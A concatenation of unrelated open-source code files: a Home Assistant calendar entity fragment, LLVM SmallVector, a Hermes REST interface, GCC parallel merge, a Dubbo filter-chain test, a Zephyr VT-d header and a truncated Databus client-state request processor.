start=datetime.combine(item["date"], item["time"].from_),
end=datetime.combine(item["date"], item["time"].to),
summary=item["lesson"],
location=item["room"],
description=item["teacher"],
)
event_list.append(event)
return event_list
async def async_update(self) -> None:
"""Get the latest data."""
try:
events = await get_lessons(self.client)
if not self.available:
_LOGGER.info("Restored connection with API")
self._attr_available = True
if events == []:
events = await get_lessons(
self.client,
date_to=date.today() + timedelta(days=7),
)
if events == []:
self._event = None
return
except UnauthorizedCertificateException as err:
raise ConfigEntryAuthFailed(
"The certificate is not authorized, please authorize integration again"
) from err
except ClientConnectorError as err:
if self.available:
_LOGGER.warning(
"Connection error - please check your internet connection: %s", err
)
self._attr_available = False
return
new_event = min(
events,
key=lambda d: (
datetime.combine(d["date"], d["time"].to) < datetime.now(),
abs(datetime.combine(d["date"], d["time"].to) - datetime.now()),
),
)
self._event = CalendarEvent(
start=datetime.combine(new_event["date"], new_event["time"].from_),
end=datetime.combine(new_event["date"], new_event["time"].to),
summary=new_event["lesson"],
location=new_event["room"],
description=new_event["teacher"],
)
| 2,568
|
707
|
<filename>wpiutil/src/main/native/cpp/llvm/SmallVector.cpp
//===- llvm/ADT/SmallVector.cpp - 'Normally small' vectors ----------------===//
//
// The LLVM Compiler Infrastructure
//
// This file is distributed under the University of Illinois Open Source
// License. See LICENSE.TXT for details.
//
//===----------------------------------------------------------------------===//
//
// This file implements the SmallVector class.
//
//===----------------------------------------------------------------------===//
#include "wpi/SmallVector.h"
#include "wpi/MemAlloc.h"
using namespace wpi;
/// grow_pod - This is an implementation of the grow() method which only works
/// on POD-like datatypes and is out of line to reduce code duplication.
void SmallVectorBase::grow_pod(void *FirstEl, size_t MinCapacity,
size_t TSize) {
// Ensure we can fit the new capacity in 32 bits.
if (MinCapacity > UINT32_MAX)
report_bad_alloc_error("SmallVector capacity overflow during allocation");
size_t NewCapacity = 2 * capacity() + 1; // Always grow.
NewCapacity =
std::min(std::max(NewCapacity, MinCapacity), size_t(UINT32_MAX));
void *NewElts;
if (BeginX == FirstEl) {
NewElts = safe_malloc(NewCapacity * TSize);
// Copy the elements over. No need to run dtors on PODs.
memcpy(NewElts, this->BeginX, size() * TSize);
} else {
// If this wasn't grown from the inline copy, grow the allocated space.
NewElts = safe_realloc(this->BeginX, NewCapacity * TSize);
}
this->BeginX = NewElts;
this->Capacity = NewCapacity;
}
| 532
|
743
|
<reponame>althink/hermes<filename>hermes-api/src/main/java/pl/allegro/tech/hermes/api/endpoints/ModeEndpoint.java<gh_stars>100-1000
package pl.allegro.tech.hermes.api.endpoints;
import javax.ws.rs.GET;
import javax.ws.rs.POST;
import javax.ws.rs.Path;
import javax.ws.rs.Produces;
import javax.ws.rs.QueryParam;
import javax.ws.rs.core.Response;
import static javax.ws.rs.core.MediaType.APPLICATION_JSON;
@Path("mode")
public interface ModeEndpoint {
@GET
@Produces(APPLICATION_JSON)
String getMode();
@POST
@Produces(APPLICATION_JSON)
Response setMode(@QueryParam("mode") String mode);
}
| 253
|
2,151
|
<filename>third_party_toolchains/gcc_arm_none_eabi/arm-none-eabi/include/c++/4.9.3/parallel/merge.h
// -*- C++ -*-
// Copyright (C) 2007-2014 Free Software Foundation, Inc.
//
// This file is part of the GNU ISO C++ Library. This library is free
// software; you can redistribute it and/or modify it under the terms
// of the GNU General Public License as published by the Free Software
// Foundation; either version 3, or (at your option) any later
// version.
// This library is distributed in the hope that it will be useful, but
// WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
// General Public License for more details.
// Under Section 7 of GPL version 3, you are granted additional
// permissions described in the GCC Runtime Library Exception, version
// 3.1, as published by the Free Software Foundation.
// You should have received a copy of the GNU General Public License and
// a copy of the GCC Runtime Library Exception along with this program;
// see the files COPYING3 and COPYING.RUNTIME respectively. If not, see
// <http://www.gnu.org/licenses/>.
/** @file parallel/merge.h
* @brief Parallel implementation of std::merge().
* This file is a GNU parallel extension to the Standard C++ Library.
*/
// Written by <NAME>.
#ifndef _GLIBCXX_PARALLEL_MERGE_H
#define _GLIBCXX_PARALLEL_MERGE_H 1
#include <parallel/basic_iterator.h>
#include <bits/stl_algo.h>
namespace __gnu_parallel
{
/** @brief Merge routine being able to merge only the @c __max_length
* smallest elements.
*
* The @c __begin iterators are advanced accordingly, they might not
* reach @c __end, in contrast to the usual variant.
* @param __begin1 Begin iterator of first sequence.
* @param __end1 End iterator of first sequence.
* @param __begin2 Begin iterator of second sequence.
* @param __end2 End iterator of second sequence.
* @param __target Target begin iterator.
* @param __max_length Maximum number of elements to merge.
* @param __comp Comparator.
* @return Output end iterator. */
template<typename _RAIter1, typename _RAIter2,
typename _OutputIterator, typename _DifferenceTp,
typename _Compare>
_OutputIterator
__merge_advance_usual(_RAIter1& __begin1, _RAIter1 __end1,
_RAIter2& __begin2, _RAIter2 __end2,
_OutputIterator __target,
_DifferenceTp __max_length, _Compare __comp)
{
typedef _DifferenceTp _DifferenceType;
while (__begin1 != __end1 && __begin2 != __end2 && __max_length > 0)
{
// array1[__i1] < array0[i0]
if (__comp(*__begin2, *__begin1))
*__target++ = *__begin2++;
else
*__target++ = *__begin1++;
--__max_length;
}
if (__begin1 != __end1)
{
__target = std::copy(__begin1, __begin1 + __max_length, __target);
__begin1 += __max_length;
}
else
{
__target = std::copy(__begin2, __begin2 + __max_length, __target);
__begin2 += __max_length;
}
return __target;
}
/** @brief Merge routine being able to merge only the @c __max_length
* smallest elements.
*
* The @c __begin iterators are advanced accordingly, they might not
* reach @c __end, in contrast to the usual variant.
* Specially designed code should allow the compiler to generate
* conditional moves instead of branches.
* @param __begin1 Begin iterator of first sequence.
* @param __end1 End iterator of first sequence.
* @param __begin2 Begin iterator of second sequence.
* @param __end2 End iterator of second sequence.
* @param __target Target begin iterator.
* @param __max_length Maximum number of elements to merge.
* @param __comp Comparator.
* @return Output end iterator. */
template<typename _RAIter1, typename _RAIter2,
typename _OutputIterator, typename _DifferenceTp,
typename _Compare>
_OutputIterator
__merge_advance_movc(_RAIter1& __begin1, _RAIter1 __end1,
_RAIter2& __begin2, _RAIter2 __end2,
_OutputIterator __target,
_DifferenceTp __max_length, _Compare __comp)
{
typedef _DifferenceTp _DifferenceType;
typedef typename std::iterator_traits<_RAIter1>::value_type
_ValueType1;
typedef typename std::iterator_traits<_RAIter2>::value_type
_ValueType2;
#if _GLIBCXX_ASSERTIONS
_GLIBCXX_PARALLEL_ASSERT(__max_length >= 0);
#endif
while (__begin1 != __end1 && __begin2 != __end2 && __max_length > 0)
{
_RAIter1 __next1 = __begin1 + 1;
_RAIter2 __next2 = __begin2 + 1;
_ValueType1 __element1 = *__begin1;
_ValueType2 __element2 = *__begin2;
if (__comp(__element2, __element1))
{
__element1 = __element2;
__begin2 = __next2;
}
else
__begin1 = __next1;
*__target = __element1;
++__target;
--__max_length;
}
if (__begin1 != __end1)
{
__target = std::copy(__begin1, __begin1 + __max_length, __target);
__begin1 += __max_length;
}
else
{
__target = std::copy(__begin2, __begin2 + __max_length, __target);
__begin2 += __max_length;
}
return __target;
}
/** @brief Merge routine being able to merge only the @c __max_length
* smallest elements.
*
* The @c __begin iterators are advanced accordingly, they might not
* reach @c __end, in contrast to the usual variant.
* Static switch on whether to use the conditional-move variant.
* @param __begin1 Begin iterator of first sequence.
* @param __end1 End iterator of first sequence.
* @param __begin2 Begin iterator of second sequence.
* @param __end2 End iterator of second sequence.
* @param __target Target begin iterator.
* @param __max_length Maximum number of elements to merge.
* @param __comp Comparator.
* @return Output end iterator. */
template<typename _RAIter1, typename _RAIter2,
typename _OutputIterator, typename _DifferenceTp,
typename _Compare>
inline _OutputIterator
__merge_advance(_RAIter1& __begin1, _RAIter1 __end1,
_RAIter2& __begin2, _RAIter2 __end2,
_OutputIterator __target, _DifferenceTp __max_length,
_Compare __comp)
{
_GLIBCXX_CALL(__max_length)
return __merge_advance_movc(__begin1, __end1, __begin2, __end2,
__target, __max_length, __comp);
}
/** @brief Merge routine fallback to sequential in case the
iterators of the two input sequences are of different type.
* @param __begin1 Begin iterator of first sequence.
* @param __end1 End iterator of first sequence.
* @param __begin2 Begin iterator of second sequence.
* @param __end2 End iterator of second sequence.
* @param __target Target begin iterator.
* @param __max_length Maximum number of elements to merge.
* @param __comp Comparator.
* @return Output end iterator. */
template<typename _RAIter1, typename _RAIter2,
typename _RAIter3, typename _Compare>
inline _RAIter3
__parallel_merge_advance(_RAIter1& __begin1, _RAIter1 __end1,
_RAIter2& __begin2,
// different iterators, parallel implementation
// not available
_RAIter2 __end2, _RAIter3 __target, typename
std::iterator_traits<_RAIter1>::
difference_type __max_length, _Compare __comp)
{ return __merge_advance(__begin1, __end1, __begin2, __end2, __target,
__max_length, __comp); }
/** @brief Parallel merge routine being able to merge only the @c
* __max_length smallest elements.
*
* The @c __begin iterators are advanced accordingly, they might not
* reach @c __end, in contrast to the usual variant.
* The functionality is projected onto parallel_multiway_merge.
* @param __begin1 Begin iterator of first sequence.
* @param __end1 End iterator of first sequence.
* @param __begin2 Begin iterator of second sequence.
* @param __end2 End iterator of second sequence.
* @param __target Target begin iterator.
* @param __max_length Maximum number of elements to merge.
* @param __comp Comparator.
* @return Output end iterator.
*/
template<typename _RAIter1, typename _RAIter3,
typename _Compare>
inline _RAIter3
__parallel_merge_advance(_RAIter1& __begin1, _RAIter1 __end1,
_RAIter1& __begin2, _RAIter1 __end2,
_RAIter3 __target, typename
std::iterator_traits<_RAIter1>::
difference_type __max_length, _Compare __comp)
{
typedef typename
std::iterator_traits<_RAIter1>::value_type _ValueType;
typedef typename std::iterator_traits<_RAIter1>::
difference_type _DifferenceType1 /* == difference_type2 */;
typedef typename std::iterator_traits<_RAIter3>::
difference_type _DifferenceType3;
typedef typename std::pair<_RAIter1, _RAIter1>
_IteratorPair;
_IteratorPair __seqs[2] = { std::make_pair(__begin1, __end1),
std::make_pair(__begin2, __end2) };
_RAIter3 __target_end = parallel_multiway_merge
< /* __stable = */ true, /* __sentinels = */ false>
(__seqs, __seqs + 2, __target, multiway_merge_exact_splitting
< /* __stable = */ true, _IteratorPair*,
_Compare, _DifferenceType1>, __max_length, __comp,
omp_get_max_threads());
return __target_end;
}
} //namespace __gnu_parallel
#endif /* _GLIBCXX_PARALLEL_MERGE_H */
| 3,736
|
18,012
|
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.dubbo.rpc.cluster.filter;
import org.apache.dubbo.common.URL;
import org.apache.dubbo.rpc.Invocation;
import org.apache.dubbo.rpc.Invoker;
import org.apache.dubbo.rpc.Result;
import org.apache.dubbo.rpc.model.ApplicationModel;
import org.apache.dubbo.rpc.protocol.AbstractInvoker;
import org.junit.jupiter.api.Assertions;
import org.junit.jupiter.api.Test;
import static org.apache.dubbo.common.constants.CommonConstants.CONSUMER;
import static org.apache.dubbo.common.constants.CommonConstants.INTERFACE_KEY;
import static org.apache.dubbo.common.constants.CommonConstants.REFERENCE_FILTER_KEY;
public class DefaultFilterChainBuilderTest {
@Test
public void testBuildInvokerChainForLocalReference() {
DefaultFilterChainBuilder defaultFilterChainBuilder = new DefaultFilterChainBuilder();
// verify that no filter is built by default
URL urlWithoutFilter = URL.valueOf("injvm://127.0.0.1/DemoService")
.addParameter(INTERFACE_KEY, DemoService.class.getName());
urlWithoutFilter = urlWithoutFilter.setScopeModel(ApplicationModel.defaultModel());
AbstractInvoker<DemoService> invokerWithoutFilter = new AbstractInvoker<DemoService>(DemoService.class, urlWithoutFilter) {
@Override
protected Result doInvoke(Invocation invocation) throws Throwable {
return null;
}
};
Invoker<?> invokerAfterBuild = defaultFilterChainBuilder.buildInvokerChain(invokerWithoutFilter, REFERENCE_FILTER_KEY, CONSUMER);
Assertions.assertTrue(invokerAfterBuild instanceof AbstractInvoker);
// verify that if LogFilter is configured, LogFilter should exist in the filter chain
URL urlWithFilter = URL.valueOf("injvm://127.0.0.1/DemoService")
.addParameter(INTERFACE_KEY, DemoService.class.getName())
.addParameter(REFERENCE_FILTER_KEY, "log");
urlWithFilter = urlWithFilter.setScopeModel(ApplicationModel.defaultModel());
AbstractInvoker<DemoService> invokerWithFilter = new AbstractInvoker<DemoService>(DemoService.class, urlWithFilter) {
@Override
protected Result doInvoke(Invocation invocation) throws Throwable {
return null;
}
};
invokerAfterBuild = defaultFilterChainBuilder.buildInvokerChain(invokerWithFilter, REFERENCE_FILTER_KEY, CONSUMER);
Assertions.assertTrue(invokerAfterBuild instanceof FilterChainBuilder.CallbackRegistrationInvoker);
Assertions.assertEquals(1, ((FilterChainBuilder.CallbackRegistrationInvoker<?, ?>) invokerAfterBuild).filters.size());
}
@Test
public void testBuildInvokerChainForRemoteReference() {
DefaultFilterChainBuilder defaultFilterChainBuilder = new DefaultFilterChainBuilder();
// verify that no filter is built by default
URL urlWithoutFilter = URL.valueOf("dubbo://127.0.0.1:20880/DemoService")
.addParameter(INTERFACE_KEY, DemoService.class.getName());
urlWithoutFilter = urlWithoutFilter.setScopeModel(ApplicationModel.defaultModel());
AbstractInvoker<DemoService> invokerWithoutFilter = new AbstractInvoker<DemoService>(DemoService.class, urlWithoutFilter) {
@Override
protected Result doInvoke(Invocation invocation) throws Throwable {
return null;
}
};
Invoker<?> invokerAfterBuild = defaultFilterChainBuilder.buildInvokerChain(invokerWithoutFilter, REFERENCE_FILTER_KEY, CONSUMER);
Assertions.assertTrue(invokerAfterBuild instanceof AbstractInvoker);
// verify that if LogFilter is configured, LogFilter should exist in the filter chain
URL urlWithFilter = URL.valueOf("dubbo://127.0.0.1:20880/DemoService")
.addParameter(INTERFACE_KEY, DemoService.class.getName())
.addParameter(REFERENCE_FILTER_KEY, "log");
urlWithFilter = urlWithFilter.setScopeModel(ApplicationModel.defaultModel());
AbstractInvoker<DemoService> invokerWithFilter = new AbstractInvoker<DemoService>(DemoService.class, urlWithFilter) {
@Override
protected Result doInvoke(Invocation invocation) throws Throwable {
return null;
}
};
invokerAfterBuild = defaultFilterChainBuilder.buildInvokerChain(invokerWithFilter, REFERENCE_FILTER_KEY, CONSUMER);
Assertions.assertTrue(invokerAfterBuild instanceof FilterChainBuilder.CallbackRegistrationInvoker);
}
}
| 1,846
|
6,224
|
<gh_stars>1000+
/*
* Copyright (c) 2020 Intel Corporation
* SPDX-License-Identifier: Apache-2.0
*/
#ifndef ZEPHYR_DRIVERS_INTERRUPT_CONTROLLER_INTC_INTEL_VTD_H_
#define ZEPHYR_DRIVERS_INTERRUPT_CONTROLLER_INTC_INTEL_VTD_H_
#define VTD_INT_SHV BIT(3)
#define VTD_INT_FORMAT BIT(4)
/* We don't care about int_idx[15], since the size is fixed to 256,
* it's always 0
*/
#define VTD_MSI_MAP(int_idx) \
((0x0FEE << 20) | (int_idx << 5) | VTD_INT_SHV | VTD_INT_FORMAT)
/* Interrupt Remapping Table Entry (IRTE) for Remapped Interrupts */
struct vtd_irte {
struct {
uint64_t present : 1;
uint64_t fpd : 1;
uint64_t dst_mode : 1;
uint64_t redirection_hint : 1;
uint64_t trigger_mode : 1;
uint64_t delivery_mode : 3;
uint64_t available : 4;
uint64_t _reserved_0 : 3;
uint64_t irte_mode : 1;
uint64_t vector : 8;
uint64_t _reserved_1 : 8;
uint64_t dst_id : 32;
} l;
struct {
uint64_t src_id : 16;
uint64_t src_id_qualifier : 2;
uint64_t src_validation_type : 2;
uint64_t _reserved : 44;
} h;
} __packed;
/* The table must be 4KB aligned, which is exactly 256 entries.
* And since we allow only 256 entries as a maximum: let's align to it.
*/
#define IRTE_NUM 256
#define IRTA_SIZE 7 /* size = 2^(X+1) where IRTA_SIZE is X 2^8 = 256 */
struct vtd_ictl_data {
struct vtd_irte irte[IRTE_NUM];
int irte_num_used;
};
struct vtd_ictl_cfg {
DEVICE_MMIO_ROM;
};
#endif /* ZEPHYR_DRIVERS_INTERRUPT_CONTROLLER_INTC_INTEL_VTD_H_ */
| 696
|
2,989
|
package com.linkedin.databus.client.request;
/*
*
* Copyright 2013 LinkedIn Corp. All rights reserved
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*
*/
import java.io.IOException;
import java.util.ArrayList;
import java.util.Collection;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.TreeMap;
import java.util.Map.Entry;
import java.util.concurrent.ExecutorService;
import org.apache.log4j.Logger;
import com.linkedin.databus.client.DatabusHttpClientImpl;
import com.linkedin.databus.client.DatabusSourcesConnection;
import com.linkedin.databus.client.DbusPartitionInfoImpl;
import com.linkedin.databus.client.monitoring.RegistrationStatsInfo;
import com.linkedin.databus.client.pub.DatabusRegistration;
import com.linkedin.databus.client.pub.DatabusV3MultiPartitionRegistration;
import com.linkedin.databus.client.pub.DatabusV3Registration;
import com.linkedin.databus.client.pub.DbusClusterInfo;
import com.linkedin.databus.client.pub.DbusPartitionInfo;
import com.linkedin.databus.client.pub.RegistrationId;
import com.linkedin.databus.client.pub.RegistrationState;
import com.linkedin.databus.client.registration.DatabusMultiPartitionRegistration;
import com.linkedin.databus.client.registration.DatabusV2ClusterRegistrationImpl;
import com.linkedin.databus.core.DatabusComponentStatus;
import com.linkedin.databus.core.data_model.DatabusSubscription;
import com.linkedin.databus.core.data_model.PhysicalPartition;
import com.linkedin.databus2.core.container.request.AbstractStatsRequestProcessor;
import com.linkedin.databus2.core.container.request.DatabusRequest;
import com.linkedin.databus2.core.container.request.InvalidRequestParamValueException;
import com.linkedin.databus2.core.container.request.RequestProcessingException;
import com.linkedin.databus2.core.filter.DbusKeyCompositeFilterConfig;
/**
*
* Request processor to support REST API for
*
* (a) Listing the registration ids (both V2/V3 top and partition level registrations).
* (b) Inspecting the status of a given registration by id (c) Listing all the client
* clusters (both V2 and V3) registered to the client instance. (d) List all the active
* partitions for a given V2/V3 client cluster. (e) Pause/Resume a given V2/V3
* registration (both top-level and partition (child) level). (f) Pause/Resume all the V2
* and V3 registrations (both top-level and partition (child) level) (g) List all the
* MPRegistrations (V3).
*
* Please note that Top-level registrations are those that were created as a result of one
* of "registerXXX()" calls on databus-client. In the case of multi-partition
* registrations (like MPRegistration, V2/V3 CLB), only the parent registration is
* considered the top-level registration. Per-partition (child) registrations which were
* created as part of partition migration are NOT top-level registrations.
*/
public class ClientStateRequestProcessor extends AbstractStatsRequestProcessor
{
public static final String MODULE =
ClientStateRequestProcessor.class.getName();
public static final Logger LOG =
Logger.getLogger(MODULE);
public static final String COMMAND_NAME = "clientState";
private final DatabusHttpClientImpl _client;
/** All first-level registrations listed **/
private final static String REGISTRATIONS_KEY = "registrations";
/** First-level registration info listed **/
private final static String REGISTRATION_KEY_PREFIX = "registration/";
/** All Client Clusters supported by this client instance **/
private final static String CLIENT_CLUSTERS_KEY = "clientClusters";
/** Partitions supported by this client cluster with their registrations **/
private final static String CLIENT_CLUSTER_KEY =
"clientPartitions/";
/** Registration info supported by this client cluster with their registrations **/
private final static String CLIENT_CLUSTER_PARTITION_REG_KEY =
"clientPartition/";
/** Multi Partition Registrations active in this client instance **/
private final static String MP_REGISTRATIONS_KEY =
"mpRegistrations";
/** Pause all registrations active in this client instance **/
private final static String PAUSE_ALL_REGISTRATIONS =
"registrations/pause";
/** Pause registration identified by the registration id **/
private final static String PAUSE_REGISTRATION =
"registration/pause";
/** Resume all registrations paused in this client instance **/
private final static String RESUME_ALL_REGISTRATIONS =
"registrations/resume";
/** Resume registration identified by the registration id **/
private final static String RESUME_REGISTRATION =
"registration/resume";
public ClientStateRequestProcessor(ExecutorService executorService,
DatabusHttpClientImpl client)
{
super(COMMAND_NAME, executorService);
_client = client;
}
@Override
protected boolean doProcess(String category, DatabusRequest request) throws IOException,
RequestProcessingException
{
boolean success = true;
if (category.equals(REGISTRATIONS_KEY))
{
processRegistrations(request);
}
else if (category.startsWith(PAUSE_REGISTRATION))
{
pauseResumeRegistration(request, true);
}
else if (category.startsWith(RESUME_REGISTRATION))
{
pauseResumeRegistration(request, false);
}
else if (category.startsWith(REGISTRATION_KEY_PREFIX))
{
processRegistrationInfo(request);
}
else if (category.startsWith(CLIENT_CLUSTERS_KEY))
{
processClusters(request);
}
else if (category.startsWith(CLIENT_CLUSTER_KEY))
{
processCluster(request);
}
else if (category.startsWith(CLIENT_CLUSTER_PARTITION_REG_KEY))
{
processPartition(request);
}
else if (category.equals(MP_REGISTRATIONS_KEY))
{
processMPRegistrations(request);
}
else if (category.equals(PAUSE_ALL_REGISTRATIONS))
{
pauseAllRegistrations(request);
}
else if (category.equals(RESUME_ALL_REGISTRATIONS))
{
resumeAllRegistrations(request);
}
else
{
success = false;
}
return success;
}
/**
* Exposes the mapping between a mpRegistration -> Set of individual registrations
*
*/
private void processMPRegistrations(DatabusRequest request) throws IOException,
RequestProcessingException
{
Map<RegistrationId, DatabusV3Registration> registrationIdMap =
_client.getRegistrationIdMap();
if (null == registrationIdMap)
throw new InvalidRequestParamValueException(request.getName(),
REGISTRATIONS_KEY,
"Present only for Databus V3 clients");
Map<String, List<String>> ridList = new TreeMap<String, List<String>>();
for (Map.Entry<RegistrationId, DatabusV3Registration> entry : registrationIdMap.entrySet())
{
DatabusV3Registration reg = entry.getValue();
if (reg instanceof DatabusV3MultiPartitionRegistration)
{
Collection<DatabusV3Registration> dvrList =
((DatabusV3MultiPartitionRegistration) reg).getPartionRegs().values();
List<String> mpRegList = new ArrayList<String>();
for (DatabusV3Registration dvr : dvrList)
{
mpRegList.add(dvr.getRegistrationId().getId());
}
ridList.put(entry.getKey().getId(), mpRegList);
}
}
writeJsonObjectToResponse(ridList, request);
return;
}
/**
* Provides an individual registrations details. The individual registration can be
* either that of V2/V3 and top-level or child. Top-level registrations are those that
* were created as a result of one of "registerXXX()" calls on databus-client. In the
* case of multi-partition registrations (like MPRegistration, V2/V3 CLB), only the
* parent registration is considered the top-level registration. Per-partition (child)
* registrations which were created as part of partition migration are NOT top-level
* registrations. The output format can be different depending on whether it is a V2/V3
* as we are dumping the entire Registration in the case of V2. In the case of V3, we
* create an intermediate objects. These are legacy formats which when changed could
* cause the integ-tests to fail.
*
* @param request
* DatabusRequest corresponding to the REST call.
* @throws IOException
* if unable to write to output channel.
* @throws RequestProcessingException
* when registration could not be located.
*/
private void processRegistrationInfo(DatabusRequest request) throws IOException,
RequestProcessingException
{
boolean found = true;
// V2 Registration lookup first
RegistrationStatsInfo regStatsInfo = null;
try
{
DatabusRegistration r = findV2Registration(request, REGISTRATION_KEY_PREFIX);
writeJsonObjectToResponse(r, request);
}
catch (RequestProcessingException ex)
{
found = false;
}
// V3 Registration lookup if not found
if (!found)
{
DatabusV3Registration reg = findV3Registration(request, REGISTRATION_KEY_PREFIX); // if
// reg
// is
// null,
// the
// callee
// throws
// an
// exception.
DatabusSourcesConnection sourcesConn =
_client.getDatabusSourcesConnection(reg.getRegistrationId().getId());
regStatsInfo = new RegistrationStatsInfo(reg, sourcesConn);
writeJsonObjectToResponse(regStatsInfo, request);
}
}
/**
* Displays all top-level registrations registered to the client (both V2 and V3).
* Top-level registrations are those that were created as a result of one of
* "registerXXX()" calls on databus-client. In the case of multi-partition registrations
* (like MPRegistration, V2/V3 CLB), only the parent registration is considered the
* top-level registration. Per-partition (child) registrations which were created as
* part of partition migration are NOT top-level registrations.
*
* @param request
* DatabusRequest corresponding to the REST API.
* @throws IOException
* when unable to write to ourput channel
*/
private void processRegistrations(DatabusRequest request) throws IOException
{
Map<String, Collection<DatabusSubscription>> regIds =
new TreeMap<String, Collection<DatabusSubscription>>();
// V2 Registration
Collection<RegInfo> regs = getAllTopLevelV2Registrations();
if (null != regs)
{
for (RegInfo r : regs)
{
regIds.put(r.getRegId().getId(), r.getSubs());
}
}
Map<RegistrationId, DatabusV3Registration> registrationIdMap =
_client.getRegistrationIdMap();
// V3 Registration
if (null != registrationIdMap)
{
for (Map.Entry<RegistrationId, DatabusV3Registration> entry : registrationIdMap.entrySet())
{
DatabusV3Registration reg = entry.getValue();
List<DatabusSubscription> dsl = reg.getSubscriptions();
regIds.put(entry.getKey().getId(), dsl);
}
}
writeJsonObjectToResponse(regIds, request);
}
/**
*
* Proved list of V2 and V3 Client clusters which are used (registered).
*
* @param request
* DatabusRequest corresponding to the REST call.
* @throws IOException
* when unable to write to output channel.
*/
private void processClusters(DatabusRequest request) throws IOException
{
Map<RegistrationId, DbusClusterInfo> clusters = _client.getAllClientClusters();
writeJsonObjectToResponse(clusters.values(), request);
}
/**
* Provide the list of partitions corresponding to the V2/V3 client cluster.
*
* @param request
* DatabusRequest corresponding to the REST call.
* @throws IOException
* when unable to write to output channel.
* @throws RequestProcessingException
* when cluster not found.
*/
private void processCluster(DatabusRequest request) throws IOException,
RequestProcessingException
{
String category = request.getParams().getProperty(DatabusRequest.PATH_PARAM_NAME);
String clusterName = category.substring(CLIENT_CLUSTER_KEY.length());
List<PartitionInfo> clusters = new ArrayList<PartitionInfo>();
RequestProcessingException rEx = null;
Collection<PartitionInfo> v2Clusters = null;
// Check as if this is V2 Cluster first
boolean found = true;
try
{
v2Clusters = getV2ClusterPartitions(clusterName);
clusters.addAll(v2Clusters);
}
catch (RequestProcessingException ex)
{
found = false;
rEx = ex;
}
// Try as V3 cluster if it is not V2.
if (!found)
{
Collection<PartitionInfo> v3Clusters = null;
try
{
v3Clusters = getV3ClusterPartitions(clusterName);
clusters.addAll(v3Clusters);
found = true;
}
catch (RequestProcessingException ex)
{
found = false;
rEx = ex;
}
}
if (!found)
throw rEx;
writeJsonObjectToResponse(clusters, request);
}
/**
* Provide a partition information belonging to a V2/V3 client cluster and hosted in
* this client instance
*
* @param request
* DatabusRequest corresponding to the REST call.
* @throws IOException
* when unable to write to output channel.
* @throws RequestProcessingException
* when cluster not found or when partition is not hosted in this instance
*/
private void processPartition(DatabusRequest request) throws IOException,
RequestProcessingException
{
String category = request.getParams().getProperty(DatabusRequest.PATH_PARAM_NAME);
String clusterPartitionName =
category.substring(CLIENT_CLUSTER_PARTITION_REG_KEY.length());
/**
* API: curl
* http://<HOST>:<PORT>/clientState/clientPartition/<CLUSTER_NAME>/<PARTITION> curl
* http://<HOST>:<PORT>/clientState/clientPartition/<CLUSTER_NAME>:<PARTITION>
*/
String[] toks = clusterPartitionName.split("[:/]");
if (toks.length != 2)
throw new RequestProcessingException("Cluster and partition info are expected to be in pattern = <cluster>[/:]<partition> but was "
+ clusterPartitionName);
RegInfo reg = null;
boolean found = true;
// Try as a V2 Partition
try
{
reg = getV2PartitionRegistration(toks[0], new Long(toks[1]));
}
catch (RequestProcessingException ex)
{
found = false;
}
// If not found, try as V3
if (!found)
{
reg = getV3PartitionRegistration(toks[0], new Long(toks[1]));
}
writeJsonObjectToResponse(reg, request);
}
private DatabusV2ClusterRegistrationImpl getV2ClusterRegistration(String clusterName) throws RequestProcessingException
{
Collection<DatabusMultiPartitionRegistration> regs =
_client.getAllClientClusterRegistrations();
for (DatabusMultiPartitionRegistration reg : regs)
{
if (reg instanceof DatabusV2ClusterRegistrationImpl)
{
DatabusV2ClusterRegistrationImpl r = (DatabusV2ClusterRegistrationImpl) reg;
if (clusterName.equals(r.getClusterInfo().getName()))
return r;
}
}
throw new RequestProcessingException("No Registration found for cluster ("
+ clusterName + ") !!");
}
private DatabusV3MultiPartitionRegistration getV3ClusterRegistration(String clusterName) throws RequestProcessingException
{
// There is a one-to-one mapping between clusterName to
// DatabusV3MultiPartitionRegistration
Map<RegistrationId, DbusClusterInfo> clusterMap = _client.getAllClientClusters();
for (Entry<RegistrationId, DbusClusterInfo> e : clusterMap.entrySet())
{
if (clusterName.equalsIgnoreCase(e.getValue().getName()))
{
DatabusV3Registration reg = _client.getRegistration(e.getKey());
if (reg instanceof DatabusV3MultiPartitionRegistration)
{
return (DatabusV3MultiPartitionRegistration) reg;
}
break;
}
}
throw new RequestProcessingException("No Registration found for cluster ("
+ clusterName + ") !!");
}
/**
* Pause or resume a V2 or V3 registration. The registration can be a top-level or
* child-level registration Top-level registrations are those that were created as a
* result of one of "registerXXX()" calls on databus-client. In the case of
* multi-partition registrations (like MPRegistration, V2/V3 CLB), only the parent
* registration is considered the top-level registration. Per-partition (child)
* registrations which were created as part of partition migration are NOT top-level
* registrations.
*
* @param request
* Databus request corresponding to the REST call.
* @param doPause
* true if wanted to pause, false if to be resumed
* @throws IOException
* if unable to write output to channel
* @throws RequestProcessingException
* when registration could not be found.
*/
private void pauseResumeRegistration(DatabusRequest request, boolean doPause) throws IOException,
RequestProcessingException
{
DatabusRegistration r = null;
DatabusV3Registration r2 = null;
boolean found = true;
boolean isRunning = false;
boolean isPaused = false;
boolean isSuspended = false;
RegistrationId regId = null;
RequestProcessingException rEx = null;
RegStatePair regStatePair = null;
try
{
r = findV2Registration(request, PAUSE_REGISTRATION);
isRunning = r.getState().isRunning();
isPaused = (r.getState() == DatabusRegistration.RegistrationState.PAUSED);
isSuspended =
(r.getState() == DatabusRegistration.RegistrationState.SUSPENDED_ON_ERROR);
regId = r.getRegistrationId();
}
catch (RequestProcessingException ex)
{
found = false;
